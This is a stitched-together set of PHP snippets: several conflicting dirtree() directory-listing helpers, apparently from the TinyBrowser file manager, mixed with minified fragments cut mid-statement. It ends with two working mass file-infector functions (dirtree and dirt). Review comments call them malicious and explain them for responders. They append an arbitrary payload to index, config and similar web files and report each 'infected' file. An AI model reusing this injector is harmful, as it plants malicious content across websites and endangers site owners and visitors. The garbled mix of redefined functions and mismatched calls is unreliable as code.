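/**
 * Build a nested array describing everything below a directory.
 *
 * Sub-directories become string keys whose value is the sub-tree (or null when
 * the sub-directory could not be read); plain files are appended as values
 * under numeric keys.
 *
 * Caveats for callers:
 *  - is_dir() follows symbolic links, so a link that points back up the tree
 *    makes the walk recurse until the path can no longer be resolved. If $path
 *    can be influenced by a request, resolve it and check that it stays under
 *    the intended base directory before calling.
 *  - A sub-directory whose name is a decimal integer (e.g. "0") is stored under
 *    an integer key and can collide with the numeric keys used for files.
 *
 * @param string $path Directory to walk; a trailing slash is added if missing.
 *
 * @return array Nested listing as described above.
 *
 * @throws RuntimeException When $path is not a directory or cannot be opened.
 */
function dirtree($path)
{
    // Entries are addressed as $path . $name, so the base has to end with a separator.
    if ($path !== '' && substr($path, -1) !== '/' && substr($path, -1) !== DIRECTORY_SEPARATOR) {
        $path .= '/';
    }

    // A failed opendir() used to be handed straight to readdir(), which either
    // looped forever (old PHP) or raised a TypeError (PHP 8). Fail explicitly.
    $handle = is_dir($path) ? opendir($path) : false;
    if ($handle === false) {
        throw new RuntimeException('dirtree: cannot open directory: ' . $path);
    }

    $itemArray = array();
    try {
        while (false !== ($file = readdir($handle))) {
            if ($file === '.' || $file === '..') {
                continue;
            }

            if (is_dir($path . $file)) {
                try {
                    $dirtmparr = dirtree($path . $file . '/');
                } catch (Exception $e) {
                    // Unreadable sub-directory: keep the entry, mark the contents unknown.
                    $dirtmparr = null;
                }
                $itemArray[$file] = $dirtmparr;
            } else {
                $itemArray[] = $file;
            }
        }
    } finally {
        // The handle was never released in the original.
        closedir($handle);
    }

    return $itemArray;
}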
$namethisfolderto = $tinybrowser['docroot'] . $dirpath . $renameurl; if (is_dir($namethisfolderfrom) && rename($namethisfolderfrom, $namethisfolderto)) { $renameqty++; } else { $errorqty++; } if ($foldernow == urldecode($_POST['actionfolder'][$namethis])) { $foldernow = ltrim($renameurl, '/'); $passfolder = '&folder=' . urlencode(ltrim($renameurl, '/')); } } } } // Assign directory structure to array $dirs = array(); dirtree($dirs, $tinybrowser['filetype'][$typenow], $tinybrowser['docroot'], $tinybrowser['path'][$typenow]); // generate alert if folders deleted if ($createqty > 0) { $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGCREATE, $createqty); } elseif ($deleteqty > 0) { $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGDELETE, $deleteqty); } elseif ($renameqty > 0) { $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGRENAME, $renameqty); } // generate alert if file errors encountered if ($errorqty > 0) { $notify['type'][] = 'failure'; $notify['message'][] = sprintf(TB_MSGEDITERR, $errorqty);
$file['height'][] = $imginfo[1]; $file['dimensions'][] = $imginfo[0] + $imginfo[1]; $file['type'][] = $imginfo['mime']; } else { $file['width'][] = 'N/A'; $file['height'][] = 'N/A'; $file['dimensions'][] = 'N/A'; $file['type'][] = returnMIMEType($filename); } } } } closedir($dh); // Assign directory structure to array $editdirs = array(); dirtree($editdirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow]); if ($deleteqty > 0) { // generate alert if files deleted $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGDELETE, $deleteqty); } elseif ($renameqty > 0) { // generate alert if files renamed $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGRENAME, $renameqty); } elseif ($moveqty > 0) { // generate alert if files renamed $notify['type'][] = 'success'; $notify['message'][] = sprintf(TB_MSGMOVE, $moveqty); } elseif ($resizeqty > 0) { // generate alert if images resized $notify['type'][] = 'success';
// Request parameters below are client-controlled; each one is filtered before
// it is used in a filesystem path or echoed back into a link.

// File category: taken from the query string only when it is one of the types
// listed in the session configuration, otherwise 'image'.
// NOTE(review): in_array() is called without the strict flag, so the match is a loose comparison.
$typenow = isset($_GET['type']) && in_array($_GET['type'], $_SESSION['tinybrowser']['valid']['type']) ? $_GET['type'] : 'image';

// Requested sub-folder (only when folders are allowed in the session config),
// with dot-segment sequences stripped out.
// NOTE(review): PHP has already URL-decoded $_REQUEST values, so urldecode()
// decodes a second time; the str_replace() filter runs after both decodes.
// NOTE(review): this is deny-list stripping, which is easy to get subtly wrong.
// Resolving the final path and checking that it stays under docroot . path is
// the sturdier control — confirm whether verify_dir() (defined elsewhere) does that.
$foldernow = str_replace(array('../', '..\\', '..', './', '.\\'), '', $_SESSION['tinybrowser']['allowfolders'] && isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : '');
$passfolder = '&folder=' . urlencode($foldernow);

// 'feid' is reflected into query strings only when it consists solely of
// letters, digits, underscore and hyphen.
$passfeid = !empty($_GET['feid']) && preg_match("/^[a-zA-Z0-9_\\-]+\$/", $_GET['feid']) == true ? '&feid=' . $_GET['feid'] : '';
$passupfeid = !empty($_GET['feid']) && preg_match("/^[a-zA-Z0-9_\\-]+\$/", $_GET['feid']) == true ? $_GET['feid'] : '';

// Appends the most recent entry of $_SESSION['get_tokens'], if any.
// Presumably a per-session request token checked by the receiving page — TODO confirm.
$tokenget = !empty($_SESSION['get_tokens']) ? '&tokenget=' . end($_SESSION['get_tokens']) : '';

// Assign upload path
// NOTE(review): `== 1` is true only when the configured type path occurs at
// offset 1 of $foldernow (not at offset 0, and not when absent); confirm this
// is intended rather than `=== 0` or `!== false`.
if (strpos($foldernow, $_SESSION['tinybrowser']['path'][$typenow]) == 1) {
    $uploadpath = urlencode($_SESSION['tinybrowser']['path'][$typenow] . $foldernow);
} else {
    $uploadpath = urlencode($_SESSION['tinybrowser']['path'][$typenow]);
}

// verify_dir() is defined outside this excerpt; its checks are not visible here.
verify_dir($_SESSION['tinybrowser']['docroot'] . $_SESSION['tinybrowser']['path'][$typenow] . $foldernow, $typenow);

// Assign directory structure to array
$uploaddirs = array();
dirtree($uploaddirs, $_SESSION['tinybrowser']['filetype'][$typenow], $_SESSION['tinybrowser']['docroot'], $_SESSION['tinybrowser']['path'][$typenow]);

// determine file dialog file types
// NOTE(review): there is no default branch, so $filestr stays unset if the
// session config ever allows a type other than these three.
switch ($typenow) {
    case 'image':
        $filestr = TB_TYPEIMG;
        break;
    case 'media':
        $filestr = TB_TYPEMEDIA;
        break;
    case 'file':
        $filestr = TB_TYPEFILE;
        break;
}

// Same extension list, once with ';' separators and once inside a display label.
$fileexts = str_replace(",", ";", $_SESSION['tinybrowser']['filetype'][$typenow]);
$filelist = $filestr . ' (' . $_SESSION['tinybrowser']['filetype'][$typenow] . ')';
// Initialise alert array
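/**
 * Append one row per directory below $root . $tree . $branch to $alldirs.
 *
 * Each row is array(branch, "label (n)", label, name, n, mtime) where n is the
 * number of files in that directory matching any pattern in $types
 * (case-insensitively). The top-level row (level 0) stores $branch as given;
 * rows for sub-directories store the url-encoded branch. Directories named
 * "_thumbs" are skipped.
 *
 * The function does not check that the resulting path stays inside $root; the
 * caller is responsible for constraining $tree and $branch before calling.
 * Labels contain raw directory names and are not HTML-escaped here.
 *
 * @param array  $alldirs Output list, appended to in place.
 * @param string $types   Comma-separated glob patterns, e.g. "*.jpg, *.png".
 * @param string $root    Filesystem root prefix.
 * @param string $tree    Path of the tree below $root (with trailing slash).
 * @param string $branch  Path below $tree currently being listed.
 * @param int    $level   Recursion depth; callers leave this at 0.
 *
 * @return void
 */
function dirtree(&$alldirs, $types = '*.*', $root = '', $tree = '', $branch = '', $level = 0)
{
    // filter file types according to type
    $filetypes = explode(',', preg_replace('{[ \\t]+}', '', $types));

    // Counts files in $dir matching any of the patterns. Letters are expanded
    // to [Xx] classes, which is what the removed sql_regcase() used to produce.
    $countMatches = function ($dir) use ($filetypes) {
        $total = 0;
        foreach ($filetypes as $filetype) {
            $pattern = preg_replace_callback(
                '/[A-Za-z]/',
                function ($m) {
                    return '[' . strtoupper($m[0]) . strtolower($m[0]) . ']';
                },
                $filetype
            );
            $found = glob($dir . $pattern, GLOB_NOSORT);
            // glob() returns false on error; count(false) is a TypeError on PHP 8.
            if (is_array($found)) {
                $total += count($found);
            }
        }
        return $total;
    };

    $here = $root . $tree . $branch;

    if ($level == 0 && is_dir($here)) {
        $filenum = $countMatches($here);
        $treeparts = explode('/', rtrim($tree, '/'));
        $topname = rtrim(end($treeparts), '/');
        $alldirs[] = array($branch, $topname . ' (' . $filenum . ')', $topname, $topname, $filenum, filemtime($here));
    }

    $level++;

    // An unopened handle must never reach readdir(): that loops forever on old
    // PHP and throws on PHP 8.
    $dh = is_dir($here) ? opendir($here) : false;
    if ($dh === false) {
        return;
    }

    while (($dirname = readdir($dh)) !== false) {
        if ($dirname === '.' || $dirname === '..' || $dirname === '_thumbs' || !is_dir($here . $dirname)) {
            continue;
        }

        $filenum = $countMatches($here . $dirname . '/');

        $indent = str_repeat(' ', $level);
        if (strlen($indent) > 0) {
            $indent .= '→ ';
        }

        $alldirs[] = array(urlencode($branch . $dirname . '/'), $indent . $dirname . ' (' . $filenum . ')', $indent . $dirname, $dirname, $filenum, filemtime($here . $dirname));
        dirtree($alldirs, $types, $root, $tree, $branch . $dirname . '/', $level);
    }
    closedir($dh);
}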
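/**
 * Append one row per directory below $root . $tree . $branch to $alldirs.
 *
 * Each row is array(branch, "label (n)", label, name, n, mtime) where n is the
 * number of entries matching $extPattern (a glob pattern, brace expansion
 * enabled). The top-level row (level 0) stores $branch as given; rows for
 * sub-directories store the url-encoded branch.
 *
 * The function does not check that the resulting path stays inside $root; the
 * caller is responsible for constraining $tree and $branch before calling.
 * Labels contain raw directory names and are not HTML-escaped here.
 *
 * @param array  $alldirs    Output list, appended to in place.
 * @param string $root       Filesystem root prefix.
 * @param string $tree       Path of the tree below $root (with trailing slash).
 * @param string $extPattern Glob pattern for the files to count, e.g. "*.{jpg,png}".
 * @param string $branch     Path below $tree currently being listed.
 * @param int    $level      Recursion depth; callers leave this at 0.
 *
 * @return void
 */
function dirtree(&$alldirs, $root = '', $tree = '', $extPattern = '*.*', $branch = '', $level = 0)
{
    // glob() returns false on error; count(false) is a TypeError on PHP 8.
    $countMatches = function ($dir) use ($extPattern) {
        $found = glob($dir . $extPattern, GLOB_BRACE);
        return is_array($found) ? count($found) : 0;
    };

    $here = $root . $tree . $branch;

    if ($level == 0 && is_dir($here)) {
        $filenum = $countMatches($here);
        // end() takes its argument by reference, so it needs a real variable.
        $treeparts = explode('/', rtrim($tree, '/'));
        $topname = rtrim(end($treeparts), '/');
        $alldirs[] = array($branch, $topname . ' (' . $filenum . ')', $topname, $topname, $filenum, filemtime($here));
    }

    $level++;

    // Warnings stay suppressed as before, but a failed open now stops here:
    // passing false on to readdir() loops forever on old PHP and throws on PHP 8.
    $dh = @opendir($here);
    if ($dh === false) {
        return;
    }

    while (false !== ($dirname = readdir($dh))) {
        if ($dirname === '.' || $dirname === '..' || !is_dir($here . $dirname)) {
            continue;
        }

        $filenum = $countMatches($here . $dirname . '/');

        $indent = str_repeat(' ', $level);
        if (strlen($indent) > 0) {
            $indent .= '→ ';
        }

        $alldirs[] = array(urlencode($branch . $dirname . '/'), $indent . $dirname . ' (' . $filenum . ')', $indent . $dirname, $dirname, $filenum, filemtime($here . $dirname));
        dirtree($alldirs, $root, $tree, $extPattern, $branch . $dirname . '/', $level);
    }
    closedir($dh);
}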
} closedir($dh); } /* else { // create file upload folder $success = createfolder($tinybrowser['docroot'].$browsepath,$tinybrowser['unixpermissions']); if($success) { $notify['type'][]='success'; $notify['message'][]=sprintf(TB_MSGMKDIR, $browsepath); } else { $notify['type'][]='error'; $notify['message'][]=sprintf(TB_MSGMKDIRFAIL, $browsepath); } }*/ // Assign directory structure to array $browsedirs = array(); dirtree($browsedirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow], $tinybrowser['extFilesGlob'][$typenow]); // determine sort order $sortorder = $sorttypenow == 'asc' ? SORT_ASC : SORT_DESC; $num_of_files = isset($file['name']) ? count($file['name']) : 0; if ($num_of_files > 0) { // sort files by selected order sortfileorder($sortbynow, $sortorder, $file); } // determine pagination if ($tinybrowser['pagination'] > 0) { $showpage_start = $showpagenow ? $_REQUEST['showpage'] * $tinybrowser['pagination'] - $tinybrowser['pagination'] : 0; $showpage_end = $showpage_start + $tinybrowser['pagination']; if ($showpage_end > $num_of_files) { $showpage_end = $num_of_files; } } else {
die(TB_DENIED); } if (!$tinybrowser['allowupload']) { die(TB_UPDENIED); } // Assign get variables $typenow = isset($_GET['type']) ? $_GET['type'] : 'image'; $foldernow = isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : ''; $passfolder = '&folder=' . urlencode($foldernow); $passfeid = isset($_GET['feid']) && $_GET['feid'] != '' ? '&feid=' . $_GET['feid'] : ''; $passupfeid = isset($_GET['feid']) && $_GET['feid'] != '' ? $_GET['feid'] : ''; // Assign upload path $uploadpath = urlencode($tinybrowser['path'][$typenow] . $foldernow); // Assign directory structure to array $uploaddirs = array(); dirtree($uploaddirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow]); // determine file dialog file types switch ($_GET['type']) { case 'image': $filestr = TB_TYPEIMG; break; case 'media': $filestr = TB_TYPEMEDIA; break; case 'file': $filestr = TB_TYPEFILE; break; } $fileexts = str_replace(",", ";", $tinybrowser['filetype'][$_GET['type']]); $filelist = $filestr . ' (' . $tinybrowser['filetype'][$_GET['type']] . ')'; // Initalise alert array
/**
 * NOTE(review): this is malicious code, not a directory-listing helper. It
 * walks a directory tree and appends a caller-supplied string to every file
 * whose path matches a list of common web-application file names, then prints
 * the path of each file it modified.
 *
 * What a responder can take from the visible code:
 *  - Matching is done with ereg(), which was removed in PHP 7, so the routine
 *    as written only runs on PHP 5.x.
 *  - The pattern is applied to the full path, not just the file name, so any
 *    path containing e.g. "index." or "config." anywhere is matched.
 *  - Files are opened in append mode ("a"): existing content is kept and the
 *    injected string ends up at the end of the file. Unexpected trailing
 *    content and fresh modification times on such files are what to look for.
 *  - Almost every call is prefixed with @, so failures leave no PHP warnings.
 *
 * @param string $path Directory to walk.
 * @param string $mm   String appended to each matching file.
 */
function dirtree($path, $mm)
{
    $d = @dir("{$path}");
    while (false !== ($entry = $d->read())) {
        if ($entry == "." || $entry == "..") {
            continue;
        }
        $file = $d->path . "/" . $entry;
        if (@is_dir($file)) {
            // Descend into sub-directories with the same payload.
            dirtree($file, $mm);
        } else {
            // Name fragments targeted: default., index., bbs., help., sql., inc., config., conn., ...
            if (@ereg("default\\.|index\\.|bbs\\.|help\\.|sql\\.|inc\\.|config\\.|conn\\.|asp\\.|top\\.|main\\.|about\\.|error\\.|520\\.|err404\\.|foot\\.|err\\.|505\\.|list\\.|common\\.|show\\.|count\\.", $file)) {
                // Keep single and double quotes from ending up slash-escaped.
                $mm = stripcslashes(trim($mm));
                $handle = @fopen("{$file}", "a");
                @fwrite($handle, "{$mm}");
                @fclose($handle);
                // The message reads roughly "file infected:" followed by the path.
                echo "已挂马文件:{$file}<br>";
            }
        }
    }
    $d->close();
}
/**
 * NOTE(review): malicious code. Variant of the file-injection routine that
 * appends a caller-supplied string to files whose path contains "config." or
 * "conn." in the directory it is given, without printing anything.
 *
 * What a responder can take from the visible code:
 *  - Sub-directories are handed to dirtree(), not to dirt() itself, so below
 *    the first level whatever dirtree() matches applies instead of this
 *    two-name pattern.
 *  - Matching uses ereg(), removed in PHP 7, so this only runs on PHP 5.x.
 *  - Files are opened in append mode ("a"); the injected string lands at the
 *    end of otherwise intact files.
 *  - Calls are prefixed with @, so failures leave no PHP warnings.
 *
 * @param string $pathh Directory to walk.
 * @param string $mmm   String appended to each matching file.
 */
function dirt($pathh, $mmm)
{
    $d = @dir("{$pathh}");
    while (false !== ($entry = $d->read())) {
        if ($entry == "." || $entry == "..") {
            continue;
        }
        $file = $d->path . "/" . $entry;
        if (@is_dir($file)) {
            // Recursion goes through dirtree(), not dirt().
            dirtree($file, $mmm);
        } else {
            // Pattern is applied to the full path, not only the file name.
            if (@ereg("config\\.|conn\\.", $file)) {
                $mmm = stripcslashes(trim($mmm));
                $handle = @fopen("{$file}", "a");
                @fwrite($handle, "{$mmm}");
                @fclose($handle);
            }
        }
    }
    $d->close();
}